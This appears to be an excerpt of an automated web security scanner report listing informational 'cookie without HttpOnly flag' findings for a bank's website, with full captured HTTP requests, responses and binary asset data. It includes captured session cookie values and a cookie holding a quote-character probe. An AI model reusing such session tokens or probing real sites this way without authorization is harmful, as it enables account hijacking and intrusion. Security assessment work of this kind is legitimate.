Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63; __utma=94208860.1014089333.1305558942.1305558942.1305562510.2; __utmc=94208860; __utmz=94208860.1305562510.2.2.utmcsr=paperg.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact.php; __utmb=94208860.1.10.1305562510; olarkld=1305562510086; wcsid=82HE08PKOH0GNJJUGLKIDRZJ41167521; _oklv=1305562512332; hblid=2AUKUUQZQC24174KYBGUP1HK41167521

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 16:15:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:20 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 16:15:20 GMT
Vary: Accept-Encoding
Content-Length: 13932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
8.85. http://www.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:16:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.regions.com/personal_banking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 160

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.regions.com/personal_banking.rf">here</a>.</h2>
</body></html>
8.86. http://www.regions.com/App_Themes/2010/Ems.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/2010/Ems.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/Ems.css HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 21952
Content-Type: text/css
Last-Modified: Wed, 09 Mar 2011 20:08:00 GMT
Accept-Ranges: bytes
ETag: "05054b095decb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:48 GMT

.../*****************************/
/* Web Channel Services: Base
/*****************************/
.foo{}

/*****************************/
/* HTML General
/*****************************/
body, h
...[SNIP]...
8.87. http://www.regions.com/App_Themes/2010/img/arrowGray_Small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/2010/img/arrowGray_Small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/arrowGray_Small.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 68
Content-Type: image/gif
Last-Modified: Fri, 25 Feb 2011 17:31:00 GMT
Accept-Ranges: bytes
ETag: "0629dc411d5cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:53 GMT

GIF89a.......VWQTTRVVXVVTUUUTTT......!.......,..........    Xf@V...V..;
8.88. http://www.regions.com/App_Themes/2010/img/hdrItemSep.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/2010/img/hdrItemSep.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/hdrItemSep.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 1071
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:53 GMT

GIF89a..................................................................................................................................................................................................
...[SNIP]...
8.89. http://www.regions.com/App_Themes/2010/img/headerfullBG.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/2010/img/headerfullBG.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/headerfullBG.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 152
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:51 GMT

GIF89a.......................................................................................................!.......,............4.$.-
#4GDD...F0.N...;
8.90. http://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/2010/img/staticBackgrounds.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/staticBackgrounds.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 799
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:51 GMT

GIF89a.....`............................................................................................................................................................................................
...[SNIP]...
8.91. http://www.regions.com/App_Themes/2010/img/staticFlyouts.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/2010/img/staticFlyouts.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/staticFlyouts.png HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 9597
Content-Type: image/png
Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT
Accept-Ranges: bytes
ETag: "08cb2645f3cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:51 GMT

.PNG
.
...IHDR...~.........D.......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..%.IDATx...].\.y......T.....,Y.E.vC.R...U/
.J.........a..r...[.I."M.."n.....F.....6.j..b..
T\....a....-.
..,...
...[SNIP]...
8.92. http://www.regions.com/App_Themes/2010/img/staticImages.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/2010/img/staticImages.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/staticImages.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 9783
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:51 GMT

GIF89a..^.......Y....T...z........b........d.9..q.g.i.....r........q.....]...Q..........Kk...........y..[....V........^.2yyyN.........h............>T...........m..........f9[....|.Yf.....g.....s.Ov...
...[SNIP]...
8.93. http://www.regions.com/App_Themes/IE6/Ems.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/IE6/Ems.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/IE6/Ems.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R1749179552; path=/
Set-Cookie: www.regions.com-http=R1402660298; path=/
Content-Type: text/css
Last-Modified: Tue, 15 Mar 2011 18:07:58 GMT
Accept-Ranges: bytes
ETag: "0d314ea3be3cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:24:02 GMT
Content-Length: 19188

.../*****************************/
/* Web Channel Services: Base
/*****************************/
.foo{}

/*****************************/
/* HTML General
/*****************************/
body, h
...[SNIP]...
8.94. http://www.regions.com/App_Themes/IE6/img/hdrItemSep.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/IE6/img/hdrItemSep.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/IE6/img/hdrItemSep.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Content-Length: 1071
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:24:09 GMT

GIF89a..................................................................................................................................................................................................
...[SNIP]...
8.95. http://www.regions.com/App_Themes/IE6/img/staticBackgrounds.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/IE6/img/staticBackgrounds.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/IE6/img/staticBackgrounds.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R2564757028; path=/
Content-Length: 799
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:24:04 GMT

GIF89a.....`............................................................................................................................................................................................
...[SNIP]...
8.96. http://www.regions.com/App_Themes/IE6/img/staticFlyouts.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/IE6/img/staticFlyouts.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/IE6/img/staticFlyouts.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R1749179552; path=/
Set-Cookie: www.regions.com-http=R1402660298; path=/
Content-Length: 9597
Content-Type: image/png
Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT
Accept-Ranges: bytes
ETag: "08cb2645f3cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:24:04 GMT

.PNG
.
...IHDR...~.........D.......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..%.IDATx...].\.y......T.....,Y.E.vC.R...U/
.J.........a..r...[.I."M.."n.....F.....6.j..b..
T\....a....-.
..,...
...[SNIP]...
8.97. http://www.regions.com/App_Themes/IE6/img/staticImages.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/IE6/img/staticImages.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/IE6/img/staticImages.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R4250181959; path=/
Content-Length: 9783
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:24:04 GMT

GIF89a..^.......Y....T...z........b........d.9..q.g.i.....r........q.....]...Q..........Kk...........y..[....V........^.2yyyN.........h............>T...........m..........f9[....|.Yf.....g.....s.Ov...
...[SNIP]...
8.98. http://www.regions.com/App_Themes/Promotion/Ems.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/Promotion/Ems.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Promotion/Ems.css HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Type: text/css
Last-Modified: Tue, 15 Mar 2011 18:07:58 GMT
Accept-Ranges: bytes
ETag: "0d314ea3be3cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:25 GMT
Content-Length: 5329

.../*********************************/
/* Web Channel Services: Promotion
/*********************************/
.foo{}

/*********************************/
/* HTML General
/**********************
...[SNIP]...
8.99. http://www.regions.com/App_Themes/Promotion/img/arrowGray_Small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/Promotion/img/arrowGray_Small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Promotion/img/arrowGray_Small.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 68
Content-Type: image/gif
Last-Modified: Fri, 25 Feb 2011 17:31:00 GMT
Accept-Ranges: bytes
ETag: "0629dc411d5cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:28 GMT

GIF89a.......VWQTTRVVXVVTUUUTTT......!.......,..........    Xf@V...V..;
8.100. http://www.regions.com/App_Themes/Promotion/img/staticBackgrounds.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/Promotion/img/staticBackgrounds.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Promotion/img/staticBackgrounds.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 799
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:31 GMT

GIF89a.....`............................................................................................................................................................................................
...[SNIP]...
8.101. http://www.regions.com/App_Themes/Promotion/img/staticImages.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /App_Themes/Promotion/img/staticImages.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Promotion/img/staticImages.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 8278
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:29 GMT

GIF89a..,....N........^.2...Kk...>......m..T..r........;_.......{.Xb.8...f..i..g..b..x....fv....a......h....z.....@...............Cj.x..d..............}.......q......X.....u..t....Y\....hg....g.....U.
...[SNIP]...
8.102. http://www.regions.com/Img/sm_558800_oo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /Img/sm_558800_oo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Img/sm_558800_oo.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 597
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:53 GMT

GIF89a    .    ....fff...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...
8.103. http://www.regions.com/JS/cmbd-jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /JS/cmbd-jquery.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JS/cmbd-jquery.min.js HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
